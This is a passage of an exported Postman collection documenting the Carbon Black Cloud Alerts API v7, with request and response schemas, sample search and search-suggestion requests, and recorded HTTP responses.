\"egress_group_id\": [\n      \"&lt;string&gt;\"\n    ],\n    \"egress_group_name\": [\n      \"&lt;string&gt;\"\n    ],\n    \"ip_reputation\": [\n      &lt;integer&gt;\n    ],\n    \"remote_is_private\": &lt;boolean&gt;,\n    \"remote_namespace\": [\n      \"&lt;string&gt;\"\n    ],\n    \"remote_replica_id\": [\n      \"&lt;string&gt;\"\"\n    ],\n    \"remote_workload_kind\": [\n      \"&lt;string&gt;\"\n    ],\n    \"remote_workload_name\": [\n      \"&lt;string&gt;\"\n    ],\n    \"tms_rule_id\": [\n      \"&lt;string&gt;\"\n    ],\n    \"threat_name\": [\n      \"&lt;string&gt;\"\n    ],\n    \"vendor_name\": [\n      \"&lt;string&gt;\"\n    ],\n    \"vendor_id\": [\n      \"&lt;string&gt;\"\n    ],\n    \"product_name\": [\n      \"&lt;string&gt;\"\n    ],\n    \"product_id\": [\n      \"&lt;string&gt;\"\n    ],\n    \"external_device_friendly_name\": [\n      \"&lt;string&gt;\"\n    ],\n    \"serial_number\": [\n      \"&lt;string&gt;\"\n    ],\n    \"blocked_name\": [\n      \"&lt;string&gt;\"\n    ],\n    \"blocked_sha256\": [\n      \"&lt;string&gt;\"\n    ],\n    \"blocked_md5\": [\n      \"&lt;string&gt;\"\n    ],\n    \"blocked_effective_reputation\": [\n      \"&lt;string&gt;\"\n    ],\n    \"ml_classification_final_verdict\": [\n      \"&lt;string&gt;\"\n    ],\n    \"ml_classification_global_prevalence\": [\n      \"&lt;string&gt;\"\n    ],\n    \"ml_classification_org_prevalence\": [\n      \"&lt;string&gt;\"\n    ],\n    \"mdr_alert\": &lt;boolean&gt;,\n    \"mdr_workflow_status\": [\n      \"&lt;string&gt;\"\n    ],\n    \"mdr_workflow_change_timestamp\": {\n      \"start\": \"&lt;dateTime&gt;\",\n      \"end\": \"&lt;dateTime&gt;\",\n      \"range\": \"&lt;string&gt;\"\n    },\n    \"mdr_workflow_is_assigned\": &lt;boolean&gt;,\n    \"mdr_determination_value\": [\n      \"&lt;string&gt;\"\n    ],\n    \"mdr_determination_change_timestamp\": {\n      \"start\": \"&lt;dateTime&gt;\",\n      \"end\": \"&lt;dateTime&gt;\",\n      \"range\": \"&lt;string&gt;\"\n    }\n  },\n  \"start\": &lt;long&gt;,\n  \"rows\": &lt;long&gt;,\n  \"sort\": [\n    {\n      \"field\": \"&lt;string&gt;\",\n      \"order\": \"&lt;string&gt;\"\n    },\n    {\n      \"field\": \"&lt;string&gt;\",\n      \"order\": \"&lt;string&gt;\"\n    }\n  ]\n}\n\n</code></pre>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}},"urlObject":{"path":["api","alerts","v7","orgs","{{cb_org_key}}","alerts","_validate"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[{"id":"c4d5a4e9-e58a-4e43-8605-fe1686431847","name":"Validate Search Request - valid","originalRequest":{"method":"POST","header":[{"key":"Content-Type","value":"application/json"},{"key":"Accept","value":"application/json"}],"body":{"mode":"raw","raw":"{\n    \"time_range\": {\n        \"range\": \"-10d\"\n    },\n    \"criteria\": {\n        \"type\": [\n            \"WATCHLIST\"\n        ],\n        \"category\": [\n            \"THREAT\",\n            \"MONITORED\"\n        ],\n        \"minimum_severity\": \"1\"\n    },\n    \"start\": 1,\n    \"rows\": 100,\n    \"sort\": [\n        {\n            \"field\": \"backend_update_timestamp\",\n            \"order\": \"desc\"\n        }\n    ]\n}","options":{"raw":{"headerFamily":"json","language":"json"}}},"url":"{{cb_url}}/api/alerts/v7/orgs/{{cb_org_key}}/alerts/_validate"},"status":"OK","code":200,"_postman_previewlanguage":"json","header":[{"key":"Date","value":"Sun, 16 Apr 2023 20:26:50 GMT"},{"key":"Content-Type","value":"application/json"},{"key":"Content-Length","value":"38"},{"key":"Connection","value":"keep-alive"},{"key":"Cache-Control","value":"no-cache, no-store, max-age=0, must-revalidate"},{"key":"Content-Encoding","value":"br"},{"key":"Expires","value":"0"},{"key":"Pragma","value":"no-cache"},{"key":"Set-Cookie","value":"JSESSIONID=A44CE50CE02B20F718E5EBED8FD5E4E0; Path=/api/alerts; Secure; HttpOnly"},{"key":"Vary","value":"Accept-Encoding"},{"key":"X-Content-Type-Options","value":"nosniff"},{"key":"X-Frame-Options","value":"DENY"},{"key":"X-Xss-Protection","value":"1; mode=block"}],"cookie":[],"responseTime":null,"body":"{\n    \"errorMessage\": null,\n    \"valid\": true\n}"},{"id":"3e10557c-7120-47d3-87df-26d4af9ccfc3","name":"Validate Search Request - Invalid, missing \"criteria\"","originalRequest":{"method":"POST","header":[{"key":"Content-Type","value":"application/json"},{"key":"Accept","value":"application/json"}],"body":{"mode":"raw","raw":"{\n    \"time_range\": {\n        \"range\": \"-10d\"\n    },\n    \"minimum_severity\": \"1\",\n    \"start\": 1,\n    \"rows\": 100,\n    \"sort\": [\n        {\n            \"field\": \"backend_update_timestamp\",\n            \"order\": \"desc\"\n        }\n    ]\n}","options":{"raw":{"headerFamily":"json","language":"json"}}},"url":"{{cb_url}}/api/alerts/v7/orgs/{{cb_org_key}}/alerts/_validate"},"status":"Bad Request","code":400,"_postman_previewlanguage":"json","header":[{"key":"Date","value":"Sun, 16 Apr 2023 20:28:21 GMT"},{"key":"Content-Type","value":"application/json"},{"key":"Content-Length","value":"237"},{"key":"Connection","value":"keep-alive"},{"key":"Cache-Control","value":"no-cache, no-store, max-age=0, must-revalidate"},{"key":"Expires","value":"0"},{"key":"Pragma","value":"no-cache"},{"key":"Set-Cookie","value":"JSESSIONID=5E44EB4600D8CF99B95C560B2DD6970E; Path=/api/alerts; Secure; HttpOnly"},{"key":"X-Content-Type-Options","value":"nosniff"},{"key":"X-Frame-Options","value":"DENY"},{"key":"X-Xss-Protection","value":"1; mode=block"}],"cookie":[],"responseTime":null,"body":"{\n    \"error_code\": \"UNEXPECTED_PROPERTY\",\n    \"message\": \"Malformed JSON input: minimum_severity\",\n    \"field\": \"minimum_severity\",\n    \"known_properties\": [\n        \"start\",\n        \"exclusions\",\n        \"query\",\n        \"rows\",\n        \"time_range\",\n        \"sort\",\n        \"criteria\"\n    ],\n    \"property_name\": \"minimum_severity\"\n}"}],"_postman_id":"5f1ee0e0-c073-49b7-a2ec-2e3db2fba56c"},{"name":"Get Alert Search Suggestions","id":"1993f2a5-7abb-4de1-a8dc-b96062d5ade3","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"GET","header":[{"key":"Accept","value":"*/*"}],"url":"{{cb_url}}/api/alerts/v7/orgs/{{cb_org_key}}/alerts/search_suggestions?query=devi&count=5","description":"<p>Provides recommendations on fields to search on based on the query provided as a query parameter.</p>\n<h3 id=\"rbac-permissions-required\">RBAC Permissions Required</h3>\n<div class=\"click-to-expand-wrapper is-table-wrapper\"><table>\n<thead>\n<tr>\n<th>Permission (.notation name)</th>\n<th>Operation(s)</th>\n</tr>\n</thead>\n<tbody>\n<tr>\n<td>org.alerts</td>\n<td>READ</td>\n</tr>\n</tbody>\n</table>\n</div><h3 id=\"response-schema\">Response Schema</h3>\n<pre class=\"click-to-expand-wrapper is-snippet-wrapper\"><code class=\"language-json\">{\n  \"suggestions\": [\n    {\n      \"term\": \"&lt;string&gt;\"\n    },\n    {\n      \"term\": \"&lt;string&gt;\"\n    }\n  ]\n}\n\n</code></pre>\n<p>See complete documentation on the <a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/platform/latest/alerts-api\">Developer Network -Alerts API</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}},"urlObject":{"path":["api","alerts","v7","orgs","{{cb_org_key}}","alerts","search_suggestions"],"host":["{{cb_url}}"],"query":[{"description":{"content":"<p>(Required) The query string for which you want completion suggestions.</p>\n","type":"text/plain"},"key":"query","value":"devi"},{"description":{"content":"<p>The number of suggestions to return</p>\n","type":"text/plain"},"key":"count","value":"5"}],"variable":[]}},"response":[{"id":"30135e28-1a35-4b8d-9d3a-8c13091b394c","name":"Get suggestions for key or values based on the specified search query","originalRequest":{"method":"GET","header":[{"key":"Accept","value":"*/*"}],"url":{"raw":"{{cb_url}}/api/alerts/v7/orgs/{{cb_org_key}}/alerts/search_suggestions?query=devi&count=5","host":["{{cb_url}}"],"path":["api","alerts","v7","orgs","{{cb_org_key}}","alerts","search_suggestions"],"query":[{"key":"query","value":"devi","description":"(Required) The query string for which you want completion suggestions."},{"key":"count","value":"5","description":"The number of suggestions to return"}]}},"status":"OK","code":200,"_postman_previewlanguage":"json","header":[{"key":"Date","value":"Sun, 16 Apr 2023 20:45:53 GMT"},{"key":"Content-Type","value":"application/json"},{"key":"Content-Length","value":"70"},{"key":"Connection","value":"keep-alive"},{"key":"Cache-Control","value":"no-cache, no-store, max-age=0, must-revalidate"},{"key":"Content-Encoding","value":"br"},{"key":"Expires","value":"0"},{"key":"Pragma","value":"no-cache"},{"key":"Set-Cookie","value":"JSESSIONID=CFC0989B1C67888A57F065B4E3C5ADA8; Path=/api/alerts; Secure; HttpOnly"},{"key":"Vary","value":"Accept-Encoding"},{"key":"X-Content-Type-Options","value":"nosniff"},{"key":"X-Frame-Options","value":"DENY"},{"key":"X-Xss-Protection","value":"1; mode=block"}],"cookie":[],"responseTime":null,"body":"{\n    \"suggestions\": [\n        {\n            \"term\": \"device_id\"\n        },\n        {\n            \"term\": \"device_os\"\n        },\n        {\n            \"term\": \"device_name\"\n        },\n        {\n            \"term\": \"device_uem_id\"\n        },\n        {\n            \"term\": \"device_policy\"\n        }\n    ]\n}"}],"_postman_id":"1993f2a5-7abb-4de1-a8dc-b96062d5ade3"},{"name":"Find alerts  - Ungrouped","id":"60ac4701-4cf3-42ee-9205-0c3bd673fe2a","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"POST","header":[{"key":"Content-Type","value":"application/json"},{"key":"Accept","value":"application/json"}],"body":{"mode":"raw","raw":"{\n    \"time_range\": {\n        \"range\": \"-2w\"\n    },\n    \"criteria\": {\n        \"minimum_severity\": 2,\n        \"device_os\": [\n            \"WINDOWS\"\n        ]\n    },\n    \"exclusions\": {\n        \"device_os_version\": [\n            \"Windows 10 x64\"\n        ],\n        \"threat_id\": [\"7103E507844087BE20351A50D8773029\"]\n    },\n    \"start\": \"1\",\n    \"rows\": \"10\",\n    \"sort\": [\n        {\n            \"field\": \"severity\",\n            \"order\": \"DESC\"\n        }\n    ]\n}","options":{"raw":{"headerFamily":"json","language":"json"}}},"url":"{{cb_url}}/api/alerts/v7/orgs/{{cb_org_key}}/alerts/_search","description":"<p>Alert search request. Multiple pathways support similar request body schemas.</p>\n<p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/platform/latest/alerts-api/#alert-search\">See Documentation</a></p>\n<h3 id=\"rbac-permissions-required\">RBAC Permissions Required</h3>\n<div class=\"click-to-expand-wrapper is-table-wrapper\"><table>\n<thead>\n<tr>\n<th>Permission (.notation name)</th>\n<th>Operation(s)</th>\n</tr>\n</thead>\n<tbody>\n<tr>\n<td>org.alerts</td>\n<td>READ</td>\n</tr>\n</tbody>\n</table>\n</div><h3 id=\"request-schema\">Request Schema</h3>\n<pre class=\"click-to-expand-wrapper is-snippet-wrapper\"><code class=\"language-json\">{\n  \"query\": \"&lt;string&gt;\",\n  \"time_range\": {\n    \"start\": \"&lt;dateTime&gt;\",\n    \"end\": \"&lt;dateTime&gt;\",\n    \"range\": \"&lt;string&gt;\"\n  },\n  \"criteria\": {\n    \"org_key\": [\n      \"&lt;string&gt;\"\n    ],\n    \"id\": [\n      \"&lt;string&gt;\"\n    ],\n    \"type\": [\n      \"&lt;string&gt;\"\n    ],\n    \"backend_timestamp\": {\n      \"start\": \"&lt;dateTime&gt;\",\n      \"end\": \"&lt;dateTime&gt;\",\n      \"range\": \"&lt;string&gt;\"\n    },\n    \"user_update_timestamp\": {\n      \"start\": \"&lt;dateTime&gt;\",\n      \"end\": \"&lt;dateTime&gt;\",\n      \"range\": \"&lt;string&gt;\"\n    },\n    \"backend_update_timestamp\": {\n      \"start\": \"&lt;dateTime&gt;\",\n      \"end\": \"&lt;dateTime&gt;\",\n      \"range\": \"&lt;string&gt;\"\n    },\n    \"detection_timestamp\": {\n      \"start\": \"&lt;dateTime&gt;\",\n      \"end\": \"&lt;dateTime&gt;\",\n      \"range\": \"&lt;string&gt;\"\n    },\n    \"first_event_timestamp\": {\n      \"start\": \"&lt;dateTime&gt;\",\n      \"end\": \"&lt;dateTime&gt;\",\n      \"range\": \"&lt;string&gt;\"\n    },\n    \"last_event_timestamp\": {\n      \"start\": \"&lt;dateTime&gt;\",\n      \"end\": \"&lt;dateTime&gt;\",\n      \"range\": \"&lt;string&gt;\"\n    },\n    \"category\": [\n      \"&lt;string&gt;\"\n    ],\n    \"minimum_severity\": &lt;integer&gt;,\n    \"reason_code\": [\n      \"&lt;string&gt;\"\n    ],\n    \"threat_id\": [\n      \"&lt;string&gt;\"\n    ],\n    \"primary_event_id\": [\n      \"&lt;string&gt;\"\n    ],\n    \"policy_applied\": [\n      \"&lt;string&gt;\"\n    ],\n    \"run_state\": [\n      \"&lt;string&gt;\"\n    ],\n    \"sensor_action\": [\n      \"&lt;string&gt;\"\n    ],\n    \"workflow_status\": [\n      \"&lt;string&gt;\"\n    ],\n    \"workflow_change_timestamp\": {\n      \"start\": \"&lt;dateTime&gt;\",\n      \"end\": \"&lt;dateTime&gt;\",\n      \"range\": \"&lt;string&gt;\"\n    },\n    \"workflow_changed_by_type\": [\n      \"&lt;string&gt;\"\n    ],\n    \"workflow_changed_by_autoclose_rule_id\": [\n      \"&lt;string&gt;\"\n    ],\n    \"workflow_closure_reason\": [\n      \"&lt;string&gt;\"\n    ],\n    \"determination_value\": [\n      \"&lt;string&gt;\"\n    ],\n    \"determination_change_timestamp\": {\n      \"start\": \"&lt;dateTime&gt;\",\n      \"end\": \"&lt;dateTime&gt;\",\n      \"range\": \"&lt;string&gt;\"\n    },\n    \"determination_changed_by_type\": [\n      \"&lt;string&gt;\"\n    ],\n    \"tags\": [\n      \"&lt;string&gt;\"\n    ],\n    \"alert_notes_present\": &lt;boolean&gt;,\n    \"threat_notes_present\": &lt;boolean&gt;,\n    \"device_id\": [\n      &lt;long&gt;\n    ],\n    \"device_name\": [\n      \"&lt;string&gt;\"\n    ],\n    \"device_uem_id\": [\n      \"&lt;string&gt;\"\n    ],\n    \"device_policy\": [\n      \"&lt;string&gt;\"\n    ],\n    \"device_policy_id\": [\n      &lt;long&gt;\n    ],\n    \"device_target_value\": [\n      \"&lt;string&gt;\"\n    ],\n    \"device_os\": [\n      \"&lt;string&gt;\"\n    ],\n    \"device_os_version\": [\n      \"&lt;string&gt;\"\n    ],\n    \"device_username\": [\n      \"&lt;string&gt;\"\n    ],\n    \"device_location\": [\n      \"&lt;string&gt;\"\n    ],\n    \"device_external_ip\": [\n      \"&lt;string&gt;\"\n    ],\n    \"device_internal_ip\": [\n      \"&lt;string&gt;\"\n    ],\n    \"rule_config_type\": [\n      \"&lt;string&gt;\"\n    ],\n    \"rule_config_name\": [\n      \"&lt;string&gt;\"\n    ],\n    \"rule_config_id\": [\n      \"&lt;string&gt;\"\n    ],\n    \"rule_category_id\": [\n      \"&lt;string&gt;\"\n    ],\n    \"rule_id\": [\n      \"&lt;string&gt;\"\n    ],\n    \"process_guid\": [\n      \"&lt;string&gt;\"\n    ],\n    \"process_pid\": [\n      &lt;integer&gt;\n    ],\n    \"process_name\": [\n      \"&lt;string&gt;\"\n    ],\n    \"process_sha256\": [\n      \"&lt;string&gt;\"\n    ],\n    \"process_md5\": [\n      \"&lt;string&gt;\"\n    ],\n    \"process_effective_reputation\": [\n      \"&lt;string&gt;\"\n    ],\n    \"process_reputation\": [\n      \"&lt;string&gt;\"\n    ],\n    \"process_cmdline\": [\n      \"&lt;string&gt;\"\n    ],\n    \"process_username\": [\n      \"&lt;string&gt;\"\n    ],\n    \"process_signatures_certificate_authority\": [\n      \"&lt;string&gt;\"\n    ],\n    \"process_signatures_publisher\": [\n      \"&lt;string&gt;\"\n    ],\n    \"parent_guid\": [\n      \"&lt;string&gt;\"\n    ],\n    \"parent_pid\": [\n      &lt;integer&gt;\n    ],\n    \"parent_name\": [\n      \"&lt;string&gt;\"\n    ],\n    \"parent_sha256\": [\n      \"&lt;string&gt;\"\n    ],\n    \"parent_md5\": [\n      \"&lt;string&gt;\"\n    ],\n    \"parent_effective_reputation\": [\n      \"&lt;string&gt;\"\n    ],\n    \"parent_reputation\": [\n      \"ADWARE\",\n      \"NOT_SUPPORTED\"\n    ],\n    \"parent_cmdline\": [\n      \"&lt;string&gt;\"\n    ],\n    \"parent_username\": [\n      \"&lt;string&gt;\"\n    ],\n    \"childproc_guid\": [\n      \"&lt;string&gt;\"\n    ],\n    \"childproc_name\": [\n      \"&lt;string&gt;\"\n    ],\n    \"childproc_sha256\": [\n      \"&lt;string&gt;\"\n    ],\n    \"childproc_md5\": [\n      \"&lt;string&gt;\"\n    ],\n    \"childproc_effective_reputation\": [\n      \"&lt;string&gt;\"\n    ],\n    \"childproc_username\": [\n      \"&lt;string&gt;\"\n    ],\n    \"childproc_cmdline\": [\n      \"&lt;string&gt;\"\n    ],\n    \"netconn_remote_port\": [\n      &lt;integer&gt;\n    ],\n    \"netconn_local_port\": [\n      &lt;integer&gt;\n    ],\n    \"netconn_protocol\": [\n      \"&lt;string&gt;\"\n    ],\n    \"netconn_remote_domain\": [\n      \"&lt;string&gt;\"\n    ],\n    \"netconn_remote_ip\": [\n      \"&lt;string&gt;\"\n    ],\n    \"netconn_local_ip\": [\n      \"&lt;string&gt;\"\n    ],\n    \"netconn_remote_ipv4\": [\n      \"&lt;string&gt;\"\n    ],\n    \"netconn_local_ipv4\": [\n      \"&lt;string&gt;\"\n    ],\n    \"netconn_remote_ipv6\": [\n      \"&lt;string&gt;\"\n    ],\n    \"netconn_local_ipv6\": [\n      \"&lt;string&gt;\"\n    ],\n    \"threat_category\": [\n      \"&lt;string&gt;\"\n    ],\n    \"ttps\": [\n      \"&lt;string&gt;\"\n    ],\n    \"attack_tactic\": [\n      \"&lt;string&gt;\"\n    ],\n    \"attack_technique\": [\n      \"&lt;string&gt;\"\n    ],\n    \"report_id\": [\n      \"&lt;string&gt;\"\n    ],\n    \"report_name\": [\n      \"&lt;string&gt;\"\n    ],\n    \"report_link\": [\n      \"&lt;string&gt;\"\n    ],\n    \"watchlists_id\": [\n      \"&lt;string&gt;\"\n    ],\n    \"watchlists_name\": [\n      \"&lt;string&gt;\"\n    ],\n    \"k8s_policy_id\": [\n      \"&lt;string&gt;\"\n    ],\n    \"k8s_policy\": [\n      \"&lt;string&gt;\"\n    ],\n    \"k8s_rule_id\": [\n      \"&lt;string&gt;\"\n    ],\n    \"k8s_rule\": [\n      \"&lt;string&gt;\"\n    ],\n    \"cluster_name\": [\n      \"&lt;string&gt;\"\n    ],\n    \"namespace\": [\n      \"&lt;string&gt;\"\n    ],\n    \"workload_kind\": [\n      \"&lt;string&gt;\"\n    ],\n    \"workload_name\": [\n      \"&lt;string&gt;\"\n    ],\n    \"replica_id\": [\n      \"&lt;string&gt;\"\n    ],\n    \"connection_type\": [\n      \"&lt;string&gt;\"\n    ],\n    \"egress_group_id\": [\n      \"&lt;string&gt;\"\n    ],\n    \"egress_group_name\": [\n      \"&lt;string&gt;\"\n    ],\n    \"ip_reputation\": [\n      &lt;integer&gt;\n    ],\n    \"remote_is_private\": &lt;boolean&gt;,\n    \"remote_namespace\": [\n      \"&lt;string&gt;\"\n    ],\n    \"remote_replica_id\": [\n      \"&lt;string&gt;\"\n    ],\n    \"remote_workload_kind\": [\n      \"&lt;string&gt;\"\n    ],\n    \"remote_workload_name\": [\n      \"&lt;string&gt;\"\n    ],\n    \"tms_rule_id\": [\n      \"&lt;string&gt;\"\n    ],\n    \"threat_name\": [\n      \"&lt;string&gt;\"\n    ],\n    \"vendor_name\": [\n      \"&lt;string&gt;\"\n    ],\n    \"vendor_id\": [\n      \"&lt;string&gt;\"\n    ],\n    \"product_name\": [\n      \"&lt;string&gt;\"\n    ],\n    \"product_id\": [\n      \"&lt;string&gt;\"\n    ],\n    \"external_device_friendly_name\": [\n      \"&lt;string&gt;\"\n    ],\n    \"serial_number\": [\n      \"&lt;string&gt;\"\n    ],\n    \"blocked_name\": [\n      \"&lt;string&gt;\"\n    ],\n    \"blocked_sha256\": [\n      \"&lt;string&gt;\"\n    ],\n    \"blocked_md5\": [\n      \"&lt;string&gt;\"\n    ],\n    \"blocked_effective_reputation\": [\n      \"&lt;string&gt;\"\n    ],\n    \"ml_classification_final_verdict\": [\n      \"&lt;string&gt;\"\n    ],\n    \"ml_classification_global_prevalence\": [\n      \"&lt;string&gt;\"\n    ],\n    \"ml_classification_org_prevalence\": [\n      \"&lt;string&gt;\"\n    ],\n    \"mdr_alert\": &lt;boolean&gt;,\n    \"mdr_workflow_status\": [\n      \"&lt;string&gt;\"\n    ],\n    \"mdr_workflow_change_timestamp\": {\n      \"start\": \"&lt;dateTime&gt;\",\n      \"end\": \"&lt;dateTime&gt;\",\n      \"range\": \"&lt;string&gt;\"\n    },\n    \"mdr_workflow_is_assigned\": &lt;boolean&gt;,\n    \"mdr_determination_value\": [\n      \"&lt;string&gt;\"\n    ],\n    \"mdr_determination_change_timestamp\": {\n      \"start\": \"&lt;dateTime&gt;\",\n      \"end\": \"&lt;dateTime&gt;\",\n      \"range\": \"&lt;string&gt;\"\n    }\n  },\n  \"exclusions\": {\n    \"org_key\": [\n      \"&lt;string&gt;\"\n    ],\n    \"id\": [\n      \"&lt;string&gt;\"\n    ],\n    \"type\": [\n      \"&lt;string&gt;\"\n    ],\n    \"backend_timestamp\": {\n      \"start\": \"&lt;dateTime&gt;\",\n      \"end\": \"&lt;dateTime&gt;\",\n      \"range\": \"&lt;string&gt;\"\n    },\n    \"user_update_timestamp\": {\n      \"start\": \"&lt;dateTime&gt;\",\n      \"end\": \"&lt;dateTime&gt;\",\n      \"range\": \"&lt;string&gt;\"\n    },\n    \"backend_update_timestamp\": {\n      \"start\": \"&lt;dateTime&gt;\",\n      \"end\": \"&lt;dateTime&gt;\",\n      \"range\": \"&lt;string&gt;\"\n    },\n    \"detection_timestamp\": {\n      \"start\": \"&lt;dateTime&gt;\",\n      \"end\": \"&lt;dateTime&gt;\",\n      \"range\": \"&lt;string&gt;\"\n    },\n    \"first_event_timestamp\": {\n      \"start\": \"&lt;dateTime&gt;\",\n      \"end\": \"&lt;dateTime&gt;\",\n      \"range\": \"&lt;string&gt;\"\n    },\n    \"last_event_timestamp\": {\n      \"start\": \"&lt;dateTime&gt;\",\n      \"end\": \"&lt;dateTime&gt;\",\n      \"range\": \"&lt;string&gt;\"\n    },\n    \"category\": [\n      \"&lt;string&gt;\"\n    ],\n    \"minimum_severity\": &lt;integer&gt;,\n    \"reason_code\": [\n      \"&lt;string&gt;\"\n    ],\n    \"threat_id\": [\n      \"&lt;string&gt;\"\n    ],\n    \"primary_event_id\": [\n      \"&lt;string&gt;\"\n    ],\n    \"policy_applied\": [\n      \"&lt;string&gt;\"\n    ],\n    \"run_state\": [\n      \"&lt;string&gt;\"\n    ],\n    \"sensor_action\": [\n      \"&lt;string&gt;\"\n    ],\n    \"workflow_status\": [\n      \"&lt;string&gt;\"\n    ],\n    \"workflow_change_timestamp\": {\n      \"start\": \"&lt;dateTime&gt;\",\n      \"end\": \"&lt;dateTime&gt;\",\n      \"range\": \"&lt;string&gt;\"\n    },\n    \"workflow_changed_by_type\": [\n      \"&lt;string&gt;\"\n    ],\n    \"workflow_changed_by_autoclose_rule_id\": [\n      \"&lt;string&gt;\"\n    ],\n    \"workflow_closure_reason\": [\n      \"&lt;string&gt;\"\n    ],\n    \"determination_value\": [\n      \"NONE\"\n    ],\n    \"determination_change_timestamp\": {\n      \"start\": \"&lt;dateTime&gt;\",\n      \"end\": \"&lt;dateTime&gt;\",\n      \"range\": \"&lt;string&gt;\"\n    },\n    \"determination_changed_by_type\": [\n      \"&lt;string&gt;\"\n    ],\n    \"tags\": [\n      \"&lt;string&gt;\"\n    ],\n    \"alert_notes_present\": &lt;boolean&gt;,\n    \"threat_notes_present\": &lt;boolean&gt;,\n    \"device_id\": [\n      &lt;long&gt;\n    ],\n    \"device_name\": [\n      \"&lt;string&gt;\"\n    ],\n    \"device_uem_id\": [\n      \"&lt;string&gt;\"\n    ],\n    \"device_policy\": [\n      \"&lt;string&gt;\"\n    ],\n    \"device_policy_id\": [\n      &lt;long&gt;\n    ],\n    \"device_target_value\": [\n      \"&lt;string&gt;\"\n    ],\n    \"device_os\": [\n      \"&lt;string&gt;\"\n    ],\n    \"device_os_version\": [\n      \"&lt;string&gt;\"\n    ],\n    \"device_username\": [\n      \"&lt;string&gt;\"\n    ],\n    \"device_location\": [\n      \"&lt;string&gt;\"\n    ],\n    \"device_external_ip\": [\n      \"&lt;string&gt;\"\n    ],\n    \"device_internal_ip\": [\n      \"&lt;string&gt;\"\n    ],\n    \"rule_config_type\": [\n      \"&lt;string&gt;\"\n    ],\n    \"rule_config_name\": [\n      \"&lt;string&gt;\"\n    ],\n    \"rule_config_id\": [\n      \"&lt;string&gt;\"\n    ],\n    \"rule_category_id\": [\n      \"&lt;string&gt;\"\n    ],\n    \"rule_id\": [\n      \"&lt;string&gt;\"\n    ],\n    \"process_guid\": [\n      \"&lt;string&gt;\"\n    ],\n    \"process_pid\": [\n      &lt;integer&gt;\n    ],\n    \"process_name\": [\n      \"&lt;string&gt;\"\n    ],\n    \"process_sha256\": [\n      \"&lt;string&gt;\"\n    ],\n    \"process_md5\": [\n      \"&lt;string&gt;\"\n    ],\n    \"process_effective_reputation\": [\n      \"&lt;string&gt;\"\n    ],\n    \"process_reputation\": [\n      \"&lt;string&gt;\"\n    ],\n    \"process_cmdline\": [\n      \"&lt;string&gt;\"\n    ],\n    \"process_username\": [\n      \"&lt;string&gt;\"\n    ],\n    \"process_signatures_certificate_authority\": [\n      \"&lt;string&gt;\"\n    ],\n    \"process_signatures_publisher\": [\n      \"&lt;string&gt;\"\n    ],\n    \"parent_guid\": [\n      \"&lt;string&gt;\"\n    ],\n    \"parent_pid\": [\n      &lt;integer&gt;\n    ],\n    \"parent_name\": [\n      \"&lt;string&gt;\"\n    ],\n    \"parent_sha256\": [\n      \"&lt;string&gt;\"\n    ],\n    \"parent_md5\": [\n      \"&lt;string&gt;\"\n    ],\n    \"parent_effective_reputation\": [\n      \"&lt;string&gt;\"\n    ],\n    \"parent_reputation\": [\n      \"&lt;string&gt;\"\n    ],\n    \"parent_cmdline\": [\n      \"&lt;string&gt;\"\n    ],\n    \"parent_username\": [\n      \"&lt;string&gt;\"\n    ],\n    \"childproc_guid\": [\n      \"&lt;string&gt;\"\n    ],\n    \"childproc_name\": [\n      \"&lt;string&gt;\"\n    ],\n    \"childproc_sha256\": [\n      \"&lt;string&gt;\"\n    ],\n    \"childproc_md5\": [\n      \"&lt;string&gt;\"\n    ],\n    \"childproc_effective_reputation\": [\n      \"&lt;string&gt;\"\n    ],\n    \"childproc_username\": [\n      \"&lt;string&gt;\"\n    ],\n    \"childproc_cmdline\": [\n      \"&lt;string&gt;\"\n    ],\n    \"netconn_remote_port\": [\n      &lt;integer&gt;\n    ],\n    \"netconn_local_port\": [\n      &lt;integer&gt;\n    ],\n    \"netconn_protocol\": [\n      \"&lt;string&gt;\"\n    ],\n    \"netconn_remote_domain\": [\n      \"&lt;string&gt;\"\n    ],\n    \"netconn_remote_ip\": [\n      \"&lt;string&gt;\"\n    ],\n    \"netconn_local_ip\": [\n      \"&lt;string&gt;\"\n    ],\n    \"netconn_remote_ipv4\": [\n      \"&lt;string&gt;\"\n    ],\n    \"netconn_local_ipv4\": [\n      \"&lt;string&gt;\"\n    ],\n    \"netconn_remote_ipv6\": [\n      \"&lt;string&gt;\"\n    ],\n    \"netconn_local_ipv6\": [\n      \"&lt;string&gt;\"\n    ],\n    \"threat_category\": [\n      \"&lt;string&gt;\"\n    ],\n    \"ttps\": [\n      \"&lt;string&gt;\"\n    ],\n    \"attack_tactic\": [\n      \"&lt;string&gt;\"\n    ],\n    \"attack_technique\": [\n      \"&lt;string&gt;\"\n    ],\n    \"report_id\": [\n      \"&lt;string&gt;\"\n    ],\n    \"report_name\": [\n      \"&lt;string&gt;\"\n    ],\n    \"report_link\": [\n      \"&lt;string&gt;\"\n    ],\n    \"watchlists_id\": [\n      \"&lt;string&gt;\"\n    ],\n    \"watchlists_name\": [\n      \"&lt;string&gt;\"\n    ],\n    \"k8s_policy_id\": [\n      \"&lt;string&gt;\"\n    ],\n    \"k8s_policy\": [\n      \"&lt;string&gt;\"\n    ],\n    \"k8s_rule_id\": [\n      \"&lt;string&gt;\"\n    ],\n    \"k8s_rule\": [\n      \"&lt;string&gt;\"\n    ],\n    \"cluster_name\": [\n      \"&lt;string&gt;\"\n    ],\n    \"namespace\": [\n      \"&lt;string&gt;\"\n    ],\n    \"workload_kind\": [\n      \"&lt;string&gt;\"\n    ],\n    \"workload_name\": [\n      \"&lt;string&gt;\"\n    ],\n    \"replica_id\": [\n      \"&lt;string&gt;\"\n    ],\n    \"connection_type\": [\n      